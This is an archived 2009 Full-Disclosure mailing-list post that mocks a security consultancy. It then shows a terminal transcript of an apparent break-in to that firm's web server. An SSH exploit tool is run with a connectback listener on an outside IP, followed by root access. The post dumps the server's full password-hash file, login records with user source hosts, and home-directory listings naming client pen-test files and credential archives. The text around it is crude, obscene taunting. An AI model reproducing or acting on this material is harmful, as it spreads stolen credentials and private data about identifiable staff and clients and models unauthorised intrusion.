[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <20090725130154.175E771E657@mesh.cs.utah.edu>
Date: Sat, 25 Jul 2009 07:01:54 -0600 (MDT)
From: martin@...utah.edu (Tobias Martin)
To: full-disclosure@...ts.grok.org.uk
Subject: Matasano Creampie
WELCOME TO THE WHITEHAT HOLOCAUST
h4v3 phun suck1ng d1q @ BLACKHAT
BLACKHAT l0l m0r3 lyk3 WHITEHAT am1r1t3????
"Matasano Promotes Disclosure"
"Matasano publishes vulnerabilities. We think it's the right thing to do"
"We encourage vendors to publish, so their customers can fix"
"We are evangelists for disclosure"
"It's the right thing for our clients, and the right thing for the industry"
- XTREME 0DAY ALERT (HOLY SHIT!!) - SEVERITY: 100% LULZ (500000$) -
# ./th3_f1n4l_s0lut10n www.matasano.com
[-] Connecting to 69.61.87.163:22..
[/] Looking for valid non-root user.. adam
******** R3D4CT3D h4h4h4h4 ********
# ./th3_f1n4l_s0lut10n -u adam -t 3 www.matasano.com
[*] Connectback listener on 209.112.118.10:3338..
[!] SSH2_MSG_SERVICE_ACCEPT [OpenSSH_4.5p1, OpenSSL 0.9.8g 19 Oct 2007]
HAVE YOU BEEN AUTHORIZED TO CHANGE OR RECONFIGURE ANYTHING ON THIS SYSTEM
SINCE DECEMBER 18, 2008?
IF NOT: you must contact Jeremy for approval prior to changing anything.
THIS INCLUDES:
- DNS CONFIGURATION
- MySQL DATABASE ACCESS
- APACHE CONFIGURATION
- WORDPRESS CONFIGURATION
NO EXCEPTIONS.
adam@www:~$ uname -a
Linux www 2.6.20.1-1-686 #1 SMP Sun Mar 4 12:44:55 UTC 2007 i686 GNU/Linux
**** h4h4h4hh4h4h4 l3tz us3 m0r3 !0D4Y! H4H4H4H4H4H4H4 ****
adam@www:~$ cd /tmp
*********** B0R1NG ***********
root@www:~# cat /etc/shadow
root:$1$CpAuxIRb$yGWiBzbyrBhPHiHgvnDRR0:14100:0:99999:7:::
daemon:*:13595:0:99999:7:::
bin:*:13595:0:99999:7:::
sys:*:13595:0:99999:7:::
synd:*:13595:0:99999:7:::
man:*:13595:0:99999:7:::
mail:*:13595:0:99999:7:::
uucp:*:13595:0:99999:7:::
proxy:*:13595:0:99999:7:::
www-data:*:13595:0:99999:7:::
backup:*:13595:0:99999:7:::
list:*:13595:0:99999:7:::
nobody:*:13595:0:99999:7:::
Debian-exim:!:13595:0:99999:7:::
masano:*:13595:0:99999:7:::
identd:!:13595:0:99999:7:::
sshd:!:13595:0:99999:7:::
jrauch:$1$mG8ZVhAU$TxkhRrECsqWASz8wlCL8N0:13646:0:99999:7:::
daveg:$1$1KqYTO4P$CqMFG2ep5CKuqLONpkcOv0:13647:0:99999:7:::
tqbf:$1$KJlbYwsz$RSWEzGEOLiW5/JMhAx8.w.:13795:0:99999:7:::
dnscache:!:13596:0:99999:7:::
dnslog:!:13596:0:99999:7:::
tinydns:!:13596:0:99999:7:::
alias:!:13596:0:99999:7:::
qmaild:!:13596:0:99999:7:::
qmaill:!:13596:0:99999:7:::
qmailp:!:13596:0:99999:7:::
qmailq:!:13596:0:99999:7:::
qmailr:!:13596:0:99999:7:::
qmails:!:13596:0:99999:7:::
mysql:!:13596:0:99999:7:::
axfrdns:!:13597:0:99999:7:::
ido:*:13606:0:99999:7:::
emonti:$1$PIIaW0R.$.C.5M5gMwbb4nZXkeqmio0:14015:0:99999:7:::
alexrad:$1$8GvoZGnn$gPoLI7rrT/qJpepTBh6aJ0:13657:0:99999:7:::
max:$1$Sxj.BCUl$.DlNKOP02C1xC/E7jHmnP.:13729:0:99999:7:::
mtracy:$1$raXLSl5L$9hHXApAlU8yhGTu.hikOj1:13731:0:99999:7:::
dropbox:!$1$UEO4J2dt$2apKxq.0b1kdRJGz4gSOP/:13823:0:99999:7:::
clockwork:$1$29TK5UaH$1G4//aTIb8T94gumRrU0N.:13831:0:99999:7:::
craig:$1$Kao4AGSl$.PyNbjWXoZ3VawvYKL3Sy/:14103:0:99999:7:::
jshevitz:$1$H3YK4FdZ$dbCo6nW5oanX9SPWHwmhc.:13885:0:99999:7:::
bitten:$1$tECARcsV$DdbBKU7nphGTMtBc3u/dt1:13903:0:99999:7:::
wbrown:!:13929:0:99999:7:::
eptacek:$1$CSz8vcaY$XVxvE8AKQo7rDDJ5ER5UY0:14099:0:99999:7:::
adam:$1$V1XzZLpm$mZN1WWbcFjpKdfRXgRG2M.:14082:0:99999:7:::
rsftp:$1$wYEQgvnW$wjuA2FMc9vZD9deX5z3KB1:14427:0:99999:7:::
td:$1$HhiHNEXJ$zV12AGi2/TLEIUD6oVlOo.:14020:0:99999:7:::
clockbot:!:14023:0:99999:7:::
nagbot:!:14039:0:99999:7:::
postgres:!:14048:0:99999:7:::
chris:$1$yGFvNEqz$DfC8Tv4GAFxTLoCMFsFcg/:14100:0:99999:7:::
stephen:$1$4C2Y3qnm$82A4oTbpdm6k1/ni0iv.21:14097:0:99999:7:::
sshdl:!:14433:0:99999:7:::
root@www:~# lastlog
Username Port From Latest
root pts/1 209-20-66-239.sl Fri Aug 15 17:18:43 -0400 2008
daemon **Never logged in**
bin **Never logged in**
sys **Never logged in**
sync **Never logged in**
man **Never logged in**
mail **Never logged in**
uucp **Never logged in**
proxy **Never logged in**
www-data **Never logged in**
backup **Never logged in**
list **Never logged in**
Debian-exim **Never logged in**
masano **Never logged in**
identd **Never logged in**
sshd **Never logged in**
jrauch pts/1 static-71-244-83 Fri Jul 24 16:19:42 -0400 2009
daveg pts/1 cpe-98-14-172-27 Wed Jul 8 00:40:43 -0400 2009
tqbf pts/3 64.108.9.142 Wed Jul 22 13:54:25 -0400 2009
dnscache **Never logged in**
dnslog **Never logged in**
tinydns **Never logged in**
alias **Never logged in**
qmaild **Never logged in**
qmaill **Never logged in**
qmailp **Never logged in**
qmailq **Never logged in**
qmailr **Never logged in**
qmails **Never logged in**
mysql **Never logged in**
axfrdns **Never logged in**
ido pts/6 dsl017-073-234.c Mon Apr 2 22:59:09 -0400 2007
emonti pts/2 64.108.9.142 Fri Jul 17 16:41:44 -0400 2009
alexrad pts/1 static-71-244-83 Thu Aug 21 15:35:50 -0400 2008
max pts/1 static-71-244-83 Thu Jul 9 13:27:27 -0400 2009
mtracy pts/1 adsl-69-209-231- Tue May 26 18:26:04 -0400 2009
dropbox **Never logged in**
clockwork pts/2 dsl017-073-234.c Mon Dec 10 12:48:23 -0500 2007
craig pts/1 89.sub-75-209-16 Thu Jun 25 12:27:48 -0400 2009
jshevitz **Never logged in**
bitten pts/1 adsl-69-209-229- Tue May 20 17:08:38 -0400 2008
wbrown pts/0 adsl-068-157-221 Wed Feb 18 10:18:54 -0500 2009
eptacek pts/1 99-29-178-207.li Mon Jul 20 14:28:57 -0400 2009
adam pts/1 ool-4350ab48.dyn Sat Jul 26 20:45:18 -0400 2008
rsftp pts/2 cpe-72-231-10-94 Thu Jul 2 12:33:28 -0400 2009
td pts/1 64.108.9.142 Tue Jul 21 10:33:59 -0400 2009
clockbot **Never logged in**
nagbot **Never logged in**
postgres **Never logged in**
chris pts/2 cpe-075-176-021- Sat May 30 19:02:41 -0400 2009
stephen pts/1 static-71-244-83 Wed Jun 10 08:44:10 -0400 2009
sshdl **Never logged in**
root@www:~# ls -al /home/*
-rw-r--r-- 1 max max 1050220 Jun 20 2008 /home/pbweb.tgz
-rw-r--r-- 1 tqbf tqbf 32405 Nov 16 2007 /home/pro.tgz
/home/adam:
total 24
drwxr-sr-x 3 adam staff 4096 Jul 26 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 adam staff 159 Jul 26 2008 .bash_history
-rw------- 1 adam staff 35 Jul 26 2008 .lesshst
-rw-r--r-- 1 adam staff 18 May 19 2008 .qmail
drwxr-xr-x 2 adam staff 4096 Jul 22 2008 .ssh
/home/alexrad:
total 40
drwxr-xr-- 3 alexrad alexrad 4096 Aug 16 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 alexrad alexrad 4126 Aug 16 2008 .bash_history
-rw-r--r-- 1 alexrad alexrad 220 May 24 2007 .bash_logout
-rw-r--r-- 1 alexrad alexrad 414 May 24 2007 .bash_profile
-rw-r--r-- 1 alexrad alexrad 2227 May 24 2007 .bashrc
-rw------- 1 alexrad alexrad 81 Jul 28 2008 .lesshst
-rw-r--r-- 1 alexrad root 30 May 24 2007 .qmail
drwxr-xr-x 2 alexrad root 4096 Jun 2 2008 .ssh
/home/apt:
total 19676
drwxr-xr-x 3 root root 4096 Jun 10 17:19 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
drwxr-xr-x 3 root root 4096 Jun 10 17:19 archives
-rw-r--r-- 1 root root 10131255 Jun 10 17:19 pkgcache.bin
-rw-r--r-- 1 root root 10031562 Jun 10 17:19 srcpkgcache.bin
/home/bitten:
total 32
drwxr-xr-x 3 bitten bitten 4096 Aug 15 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 bitten bitten 259 Jun 18 2008 .bash_history
-rw-r--r-- 1 bitten bitten 220 Jan 25 2008 .bash_logout
-rw-r--r-- 1 bitten bitten 414 Jan 25 2008 .bash_profile
-rw-r--r-- 1 bitten bitten 2227 Jan 25 2008 .bashrc
drwx------ 2 bitten bitten 4096 Jan 25 2008 .ssh
-rw-r--r-- 1 bitten bitten 393 Jan 25 2008 bitten_tock.pub
/home/chris:
total 86100
drwxr-xr-x 3 chris chris 4096 Mar 30 21:51 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 chris chris 639 May 30 19:07 .bash_history
-rw-r--r-- 1 chris chris 220 Jun 23 2008 .bash_logout
-rw-r--r-- 1 chris chris 414 Jun 23 2008 .bash_profile
-rw-r--r-- 1 chris chris 2227 Jun 23 2008 .bashrc
-rw-r--r-- 1 chris root 24 Jun 23 2008 .qmail
drwx------ 2 chris chris 4096 Jul 11 2008 .ssh
-rw-r--r-- 1 chris chris 20480 Jul 17 2008 lorcon-patched-ipwraw-3945.tar
-rw-r--r-- 1 chris chris 88020326 Mar 30 21:52 nacl_linux_0.1_57_2009_03_30.tgz
/home/clockbot:
total 40
drwxr-sr-x 2 clockbot clockbot 4096 Jun 23 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw-r--r-- 1 root clockbot 491 Jun 23 2008 campfire_ids.yml
-rw-r--r-- 1 clockbot clockbot 13103 Jul 31 2008 loggedin
-rw-rw-rw- 1 clockbot clockbot 553 Jun 19 2008 map
-rw-r--r-- 1 root clockbot 929 Jun 23 2008 map.yml
-rw-r--r-- 1 clockbot clockbot 350 Jul 31 2008 registry.yml
/home/clockwork:
total 96
drwxr-xr-x 7 clockwork clockwork 4096 Dec 6 2007 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 clockwork clockwork 7857 Dec 18 2007 .bash_history
-rw-r--r-- 1 clockwork clockwork 220 Nov 13 2007 .bash_logout
-rw-r--r-- 1 clockwork clockwork 545 Nov 14 2007 .bash_profile
-rw-r--r-- 1 clockwork clockwork 2227 Nov 13 2007 .bashrc
-rw------- 1 clockwork clockwork 114 Dec 6 2007 .lesshst
-rw------- 1 clockwork clockwork 25 Nov 16 2007 .mysql_history
-rw-rw-rw- 1 clockwork clockwork 0 Aug 11 2008 .rdebug_hist
-rw------- 1 clockwork clockwork 1024 Dec 6 2007 .rnd
drwx------ 2 clockwork clockwork 4096 Nov 13 2007 .ssh
drwxr-xr-x 3 clockwork clockwork 4096 Nov 13 2007 .subversion
-rw------- 1 clockwork clockwork 1185 Nov 29 2007 Mailbox
drwxr-xr-x 6 clockwork clockwork 4096 Dec 5 2007 clockwork
drwxr-xr-x 6 clockwork clockwork 4096 Nov 16 2007 clockwork-design
drwxr-xr-x 6 clockwork clockwork 4096 Nov 13 2007 clockwork.SAVE
-rw-r--r-- 1 clockwork clockwork 32405 Nov 16 2007 pro.tgz
/home/craig:
total 7544252
drwxr-sr-x 9 craig staff 4096 Jul 23 19:02 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 craig staff 4688 Jun 25 14:09 .bash_history
-rw------- 1 craig staff 56 Jun 10 17:21 .lesshst
-rw-r--r-- 1 craig staff 26 Feb 15 2008 .qmail
drwxr-sr-x 2 craig staff 4096 Apr 29 2008 .ssh
drwxr-sr-x 3 root staff 4096 Jan 25 2008 .subversion
-rw------- 1 craig staff 78 Jul 15 2008 .tramp_history
-rw-r--r-- 1 craig craig 394806935 Jul 14 2008 Playbook1.0.tbz
-rw-r--r-- 1 craig craig 433078681 Jul 14 2008 Playbook1.0.zip
-rw-r--r-- 1 craig staff 261086305 Mar 4 16:40 Playbook2.0.tbz
-rw-r--r-- 1 craig staff 443549880 Jun 2 2008 Playbook_0.9-trunk-2365.tgz
-rw-r--r-- 1 craig staff 406559189 Jul 10 2008 Playbook_1.0.tbz
-rw-r--r-- 1 craig staff 445738100 Jul 10 2008 Playbook_1.0.zip
-rw-r--r-- 1 craig staff 315153784 Jun 5 21:32 Playbook_2.5.2.ovf.zip
-rw-r--r-- 1 craig staff 284666086 Jun 5 22:32 Playbook_2.5.2.zip
-rw-r--r-- 1 craig staff 315319864 Jun 10 20:44 Playbook_2.5.4.ovf.zip
-rw-r--r-- 1 craig staff 284808679 Jun 10 19:37 Playbook_2.5.4.zip
-rw-r--r-- 1 craig staff 315351761 Jun 19 16:11 Playbook_2.5.5.ovf.zip
-rw-r--r-- 1 craig staff 284851383 Jun 19 17:14 Playbook_2.5.5.zip
-rw-r--r-- 1 craig staff 319145609 Jul 17 19:28 Playbook_2.5.6.ovf.zip
-rw-r--r-- 1 craig staff 288324498 Jul 17 20:27 Playbook_2.5.6.zip
-rw-r--r-- 1 craig staff 318650703 Jul 23 18:03 Playbook_2.5.7.ovf.zip
-rw-r--r-- 1 craig staff 287829190 Jul 23 19:02 Playbook_2.5.7.zip
-rw-r--r-- 1 craig staff 261218578 Mar 13 18:47 Playbook_v2.0.2.tbz
-rw-r--r-- 1 craig staff 283643639 Mar 13 19:47 Playbook_v2.0.2.zip
-rw-r--r-- 1 craig staff 314953802 Jun 2 18:06 Playbook_v2.5.1.ovf.tgz
-rw-r--r-- 1 craig staff 284680686 Jun 2 19:06 Playbook_v2.5.1.zip
-rw-r--r-- 1 craig staff 314295124 May 27 15:47 Playbook_v2.5.ovf.tgz
-rw-r--r-- 1 craig staff 261439029 May 27 18:25 Playbook_v2.5.tbz
-rw-r--r-- 1 craig staff 284106431 May 27 14:31 Playbook_v2.5.zip
drwxr-xr-x 7 503 503 4096 Jan 21 2008 SVN-Notify-2.66
-rw-r--r-- 1 craig staff 56508 Jan 21 2008 SVN-Notify-2.66.tar.gz
-rw-r--r-- 1 craig staff 4896 Apr 22 2008 Settings.wiki
drwxr-sr-x 9 craig staff 4096 Feb 5 2008 bitten
-rw-r--r-- 1 craig staff 601 May 20 2008 bitten_tock.pub
-rw-r--r-- 1 craig staff 400 Dec 21 2007 craig_matasano.pub
-rw-r--r-- 1 craig staff 10966 Jul 14 2008 eula.html
-rw-r--r-- 1 craig staff 8960 Sep 4 2007 ez_setup.py
-rw-r--r-- 1 craig staff 39732722 Jun 8 14:02 playbook-third-party_2.5.2_i386.deb
-rw-r--r-- 1 craig staff 39746664 Jun 12 12:01 playbook-third-party_2.5.4_i386.deb
-rw-r--r-- 1 craig staff 23234916 Jul 9 2008 playbook_1.0-trunk-2537_i386.deb
-rw-r--r-- 1 craig staff 5439022 Jun 8 13:54 playbook_2.5.2_i386.deb
-rw-r--r-- 1 craig staff 5439054 Jun 9 14:12 playbook_2.5.3_i386.deb
-rw-r--r-- 1 craig staff 5439338 Jun 10 18:29 playbook_2.5.4_i386.deb
-rw-r--r-- 1 craig staff 5439398 Jun 19 14:35 playbook_2.5.5_i386.deb
-rw-r--r-- 1 craig staff 5439440 Jul 17 18:22 playbook_2.5.6_i386.deb
-rw-r--r-- 1 craig staff 5439548 Jul 23 19:03 playbook_2.5.7_i386.deb
drwxr-sr-x 2 craig staff 4096 Oct 13 2008 playbook_eval
-rw-r--r-- 1 craig staff 605 May 27 2008 playbook_pcnfsd.pub
-rw-r--r-- 1 craig staff 44620622 Mar 10 18:40 playbook_v2.0-4041_i386.deb
-rw-r--r-- 1 craig staff 519 Mar 13 17:39 playbook_v2.0-4067_i386.changes
-rw-r--r-- 1 craig staff 44621926 Mar 13 17:48 playbook_v2.0-4067_i386.deb
-rw-r--r-- 1 craig staff 44631314 Apr 14 14:31 playbook_v2.0-4180_i386.deb
-rw-r--r-- 1 craig staff 44631742 Apr 24 16:05 playbook_v2.0-4195_i386.deb
-rw-r--r-- 1 craig staff 193649 Jun 10 17:18 reprepro_3.10.0-1~bpo50+1_i386.deb
-rw-r--r-- 1 craig staff 601 Aug 13 2008 slugger_root.pub
-rw-r--r-- 1 craig staff 44 Jan 5 2008 test
drwxr-sr-x 9 craig staff 4096 Feb 5 2008 trac-0.11b1
drwxr-sr-x 7 craig staff 4096 Jan 25 2008 webadmin
/home/daveg:
total 218536
drwxr-xr-x 7 daveg daveg 4096 Jul 8 00:40 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
lrwxrwxrwx 1 daveg daveg 9 Jun 10 2008 .bash_history -> /dev/null
-rw-r--r-- 1 daveg daveg 615 Jun 10 2008 .bash_profile
-rw-r--r-- 1 daveg daveg 1834 Mar 23 2007 .bashrc
drwx------ 2 daveg daveg 4096 Jun 10 2008 .gnupg
-rw------- 1 daveg daveg 35 Mar 28 16:20 .lesshst
-rw-r--r-- 1 daveg root 19 Apr 17 2007 .qmail
drwxr-xr-x 2 daveg root 4096 Apr 2 2007 .ssh
-rw------- 1 daveg root 0 Feb 11 2008 Mailbox
-rw-r--r-- 1 daveg daveg 1066057 Jun 30 2007 bh07-vtx.zip
-rw-r--r-- 1 daveg eptacek 16551001 Mar 17 18:11 burp.tgz.asc
-rw-r--r-- 1 daveg daveg 56734856 Nov 24 2007 fbsd62.tbz
-rw-r--r-- 1 daveg daveg 51224188 Nov 24 2007 obsd35.tbz
-rw-r--r-- 1 daveg daveg 97905046 Nov 24 2007 obsd39.tbz
drwxr-xr-x 2 daveg daveg 4096 Jul 9 2007 public_html
drwxr-xr-x 2 root root 4096 Jul 16 2008 saved_from_rsftp
drwxr-xr-x 2 root root 4096 Jul 21 2008 tmp
/home/dnm:
total 844
drwx--x--x 3 eptacek dnm 4096 Dec 5 2007 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw-r--r-- 1 eptacek dnm 220 Apr 5 2007 .bash_logout
-rw-r--r-- 1 eptacek dnm 414 Apr 5 2007 .bash_profile
-rw-r--r-- 1 eptacek dnm 2227 Apr 5 2007 .bashrc
drwx--x--x 2 root root 4096 Sep 11 2007 .ssh-bak
-rw------- 1 eptacek dnm 831612 Jan 22 2008 Mailbox
/home/dropbox:
total 20068
drwxr-xr-x 3 dropbox dropbox 4096 Mar 11 11:04 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw-r--r-- 1 dropbox dropbox 220 Sep 20 2007 .bash_logout
-rw-r--r-- 1 dropbox dropbox 414 Sep 20 2007 .bash_profile
-rw-r--r-- 1 dropbox dropbox 2227 Sep 20 2007 .bashrc
-rw-r----- 1 dropbox dropbox 192 Mar 5 12:33 1385.zip
-rw------- 1 dropbox td 231 Mar 3 13:43 1729.zip
-rw------- 1 dropbox dropbox 245 Mar 5 12:33 99.zip
-rw-r----- 1 dropbox emonti 76701 Mar 5 12:32 Checklists.zip
-rw-r--r-- 1 mtracy mtracy 28355 Sep 4 2007 FilerDB_port_12345.txt
-rw------- 1 dropbox mtracy 92672 Feb 12 18:50 ISA Pen Test Availability_13_Feb.xls
-rw------- 1 dropbox td 92672 Feb 13 17:44 ISA Pen Test Availability_14_Feb.xls
-rw------- 1 dropbox td 92672 Feb 16 10:53 ISA Pen Test Availability_16_Feb.xls
-rw------- 1 dropbox dropbox 12709736 Mar 11 10:11 Mailbox
-rw-r--r-- 1 dropbox mtracy 5274 Feb 13 11:06 Q3Files.zip
-rw------- 1 dropbox td 5477 Feb 16 10:53 Q3Lists.zip
-rwxr-xr-x 1 mtracy mtracy 52838 Aug 30 2007 Qube.js
-rw-r--r-- 1 dropbox td 1527 Feb 11 15:13 Queue3IN_Sites.zip
-rw------- 1 dropbox td 390212 Mar 3 13:43 Tester Record v.1.12 (03-Mar updates) - ABN.zip
-rw------- 1 dropbox mtracy 269088 Feb 12 18:50 Tester Record v.1.12 (13-Feb updates) - ABN.zip
-rw------- 1 dropbox td 347194 Feb 16 10:53 Tester Record v.1.12 (16-Feb updates) - ABN.zip
-rw------- 1 dropbox dropbox 255010 Mar 5 12:32 Tester Record v.1.15 (05-Mar updates) - ABN.zip
-rw------- 1 dropbox dropbox 291328 Mar 5 12:33 Web Security - Reporting Template - 020509.doc
drwxr-xr-x 2 dropbox mtracy 4096 Feb 12 18:51 arch
-rw-r--r-- 1 emonti emonti 2647319 Sep 13 2007 bkb.tar.gz
-rw-r--r-- 1 dropbox td 1653 Feb 11 15:02 client_prod.p12
-rw------- 1 dropbox td 7224 Feb 10 12:44 creds.txt
-rw-r--r-- 1 mtracy mtracy 14559 Nov 5 2007 demo_mysqldump.dump.gz
-rw-r--r-- 1 dropbox td 373112 Feb 13 17:45 dropfiles
-rw-r--r-- 1 dropbox td 289061 Feb 11 21:10 dropfiles0211.tgz
-rw-r--r-- 1 dropbox td 373112 Feb 13 17:45 dropfiles021309.tgz
-rw-r--r-- 1 dropbox td 374675 Feb 16 16:17 dropfiles0216.tgz
-rw-r--r-- 1 dropbox td 399360 Mar 3 13:43 dropfiles0303.tar
-rw-r--r-- 1 dropbox emonti 552960 Mar 5 12:35 dropfiles0305.tar
-rw-r--r-- 1 dropbox mtracy 504105 Feb 12 18:51 dropfiles_2-12.tgz
-rw-r--r-- 1 dropbox mtracy 37966 Feb 11 11:55 india_creds.tgz
-rwxr-xr-x 1 mtracy mtracy 40395 Aug 30 2007 menu.js
-rw-r--r-- 1 root root 33391 Oct 6 2007 qmail.patch
/home/emonti:
total 1128684
drwxr-sr-x 6 emonti staff 4096 Jun 23 13:02 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 emonti staff 5275 Jul 17 18:53 .bash_history
-rw------- 1 emonti staff 46 Apr 21 13:35 .lesshst
-rw-r--r-- 1 emonti staff 87 Mar 6 2008 .profile
-rw-r--r-- 1 emonti staff 18 Apr 17 2007 .qmail
drwx------ 2 emonti staff 4096 Aug 29 2007 .ssh
-rw-r--r-- 1 emonti staff 745116041 Mar 16 21:26 HA_DESKTOP_IMAGE.ZIP.gpg
-rw-r--r-- 1 emonti staff 431727 Mar 5 16:27 blackbag-0.9.1.tgz
-rw-r--r-- 1 emonti staff 1679 May 30 2008 emonti.gpgkey
-rwxr-xr-x 1 emonti staff 2442 May 30 2008 getcode.py
-rw-r--r-- 1 emonti staff 2527 Feb 6 01:32 hello_rmi.tgz
-rw-r--r-- 1 emonti staff 60 Jun 15 18:34 helu_world.c
-rwxr-xr-x 1 emonti staff 6407 Jun 15 18:34 helu_world.elf
-rw-r--r-- 1 emonti staff 1669 Mar 4 2008 hexdump.rb
-rwxr-xr-x 1 emonti staff 1398 Feb 6 01:53 rmiquery.rb
-rwxr-xr-x 1 emonti staff 2290 Feb 6 01:53 rmiscan.rb
drwxr-xr-x 8 emonti staff 4096 Mar 4 2008 ruckus
-rw-r--r-- 1 emonti staff 135001 Mar 5 16:30 serial_snoop.tar.gz
-rw-r--r-- 1 emonti staff 408843181 Nov 3 2008 testlamp.tgz.gpg
drwxr-sr-x 2 emonti staff 4096 May 1 2008 third-party
-rwxr-xr-x 1 emonti staff 4205 Mar 7 2008 udpplug.rb
drwxr-sr-x 3 emonti staff 4096 Jun 23 2008 up
/home/eptacek:
total 270180
drwxr-xr-x 9 eptacek eptacek 4096 Jul 13 15:23 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 eptacek eptacek 7727 Jul 20 14:51 .bash_history
-rw-r--r-- 1 eptacek eptacek 644 Jun 10 2008 .bash_profile
-rw-r--r-- 1 eptacek eptacek 1868 Apr 27 2008 .bashrc
drwx------ 2 eptacek eptacek 4096 Jul 13 15:19 .gnupg
-rw------- 1 eptacek eptacek 35 Apr 13 09:27 .lesshst
drwxr-xr-x 2 eptacek eptacek 4096 Sep 24 2008 .mutt
lrwxrwxrwx 1 eptacek eptacek 8 Sep 24 2008 .muttrc -> .mutt/rc
-rw------- 1 eptacek eptacek 325 Jul 24 2008 .mysql_history
-rw-r--r-- 1 eptacek eptacek 21 Aug 8 2008 .qmail
dr-x------ 2 root eptacek 4096 Aug 8 2008 .save
drwx------ 2 eptacek eptacek 4096 May 20 14:38 .ssh
dr-x------ 3 eptacek eptacek 4096 Mar 27 2007 .subversion
dr-x------ 2 eptacek eptacek 4096 Dec 5 2007 .w3m
-rw-r--r-- 1 eptacek eptacek 21969 May 20 16:27 01-01.gif
-rw-r--r-- 1 eptacek eptacek 41934 May 20 16:36 02.gif
-rw-r--r-- 1 eptacek eptacek 24547 May 20 16:56 03.gif
drwx------ 2 eptacek eptacek 4096 Feb 5 12:40 Mailbox
-rw-r--r-- 1 eptacek eptacek 101390 Jun 18 22:53 Picture 15.png
-rw-r--r-- 1 eptacek eptacek 273678336 May 18 15:47 bunny.tgz
-rw-r--r-- 1 eptacek eptacek 2366 Feb 24 17:52 chisec-list
-rw-r--r-- 1 eptacek eptacek 10734 May 20 14:27 extracted-main.css
-rw-r--r-- 1 eptacek eptacek 81810 Mar 17 18:11 grr
-rw-r--r-- 1 eptacek eptacek 2899 May 20 15:31 m5.gif
-rw-r--r-- 1 eptacek eptacek 242283 Jan 20 2009 mingu.tgz
-rw-r--r-- 1 eptacek eptacek 916524 Apr 22 12:50 oops.jpg
-rw-r--r-- 1 eptacek eptacek 908240 Jun 5 13:51 proposal-stuff.tar.asc
-rw------- 1 eptacek eptacek 8639 Jun 25 15:35 sent
-rw-r--r-- 1 eptacek eptacek 165583 Jun 17 12:27 ss.png
-rw-r--r-- 1 eptacek eptacek 22067 May 20 15:40 whatsnew-0.gif
-rw-r--r-- 1 eptacek eptacek 44669 May 20 15:02 whatsnew-lightgreen.png
/home/ido:
total 40
drwx--x--x 3 ido ido 4096 Aug 14 2007 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 ido ido 156 Apr 3 2007 .bash_history
-rw-r--r-- 1 ido ido 220 Apr 2 2007 .bash_logout
-rw-r--r-- 1 ido ido 414 Apr 2 2007 .bash_profile
-rw-r--r-- 1 ido ido 2227 Apr 2 2007 .bashrc
-rw------- 1 ido ido 40 Apr 2 2007 .lesshst
drwx--x--x 2 ido root 4096 Apr 2 2007 .ssh
-rw------- 1 ido ido 7161 Aug 14 2007 Mailbox
/home/jrauch:
total 408884
drwxr-xr-x 11 jrauch jrauch 4096 Jul 24 16:19 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 jrauch jrauch 5331 Jul 24 18:33 .bash_history
-rw-r--r-- 1 jrauch jrauch 567 Mar 23 2007 .bash_profile
-rw-r--r-- 1 jrauch jrauch 1885 Apr 8 2008 .bashrc
-rw------- 1 jrauch jrauch 58 Jan 19 2009 .lesshst
-rw-r--r-- 1 jrauch jrauch 22 May 12 2007 .qmail
-rw-r--r-- 1 jrauch jrauch 22 May 23 2007 .qmail-default
drwxr-xr-x 2 jrauch jrauch 4096 Mar 25 2007 .ssh
-rw-r--r-- 1 jrauch jrauch 83380 Jul 22 01:06 CC_DOS.zip
drwx------ 2 jrauch jrauch 4096 Jun 6 2007 Mail
drwx------ 5 jrauch root 4096 Nov 16 2007 Maildir
drwxr-xr-x 3 root root 4096 Feb 22 2008 blog
-rw------- 1 jrauch jrauch 165628 Jul 15 12:52 cc0715.zip
-rw------- 1 jrauch jrauch 180561 Jul 17 15:24 cc0717.zip
-rw-r--r-- 1 jrauch jrauch 309163 Jul 24 16:19 cc0724.zip
drwxr-xr-x 4 jrauch jrauch 4096 Jun 18 2008 db
drwxr-xr-x 2 jrauch jrauch 4096 Aug 9 2008 en
drwxr-xr-x 12 501 staff 4096 Oct 14 2008 httpd-2.2.9
-rw-r--r-- 1 root root 6396996 Jun 13 2008 httpd-2.2.9.tar.gz
drwxr-xr-x 2 root root 4096 Oct 17 2008 jpegs
-rw-r--r-- 1 jrauch jrauch 143360 Oct 24 2008 mtso.tar
drwxr-xr-x 2 jrauch jrauch 4096 Oct 10 2008 public_html
-rw-r--r-- 1 root root 1976320 Aug 11 2008 services.tar
-rw-r--r-- 1 jrauch jrauch 61440 Jul 8 11:23 sshd.tar
-rw-r--r-- 1 root root 408843181 Nov 3 2008 testlamp.tgz.gpg
/home/jshevitz:
total 28
drwxr-xr-x 2 jshevitz jshevitz 4096 Jan 7 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw-r--r-- 1 jshevitz jshevitz 220 Jan 7 2008 .bash_logout
-rw-r--r-- 1 jshevitz jshevitz 414 Jan 7 2008 .bash_profile
-rw-r--r-- 1 jshevitz jshevitz 2227 Jan 7 2008 .bashrc
-rw-r--r-- 2 jshevitz root 20 Jan 7 2008 .qmail
-rw-r--r-- 2 jshevitz root 20 Jan 7 2008 .qmail-default
/home/log-archives:
total 54776
drwxr-sr-x 2 root staff 4096 Mar 28 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 root root 16167 Mar 23 2007 base-config.log.1.gz
-rw------- 1 root root 4637 Mar 23 2007 base-config.timings.1.gz
-rw-r----- 1 root adm 3246 Mar 24 2007 daemon.log.0.gz
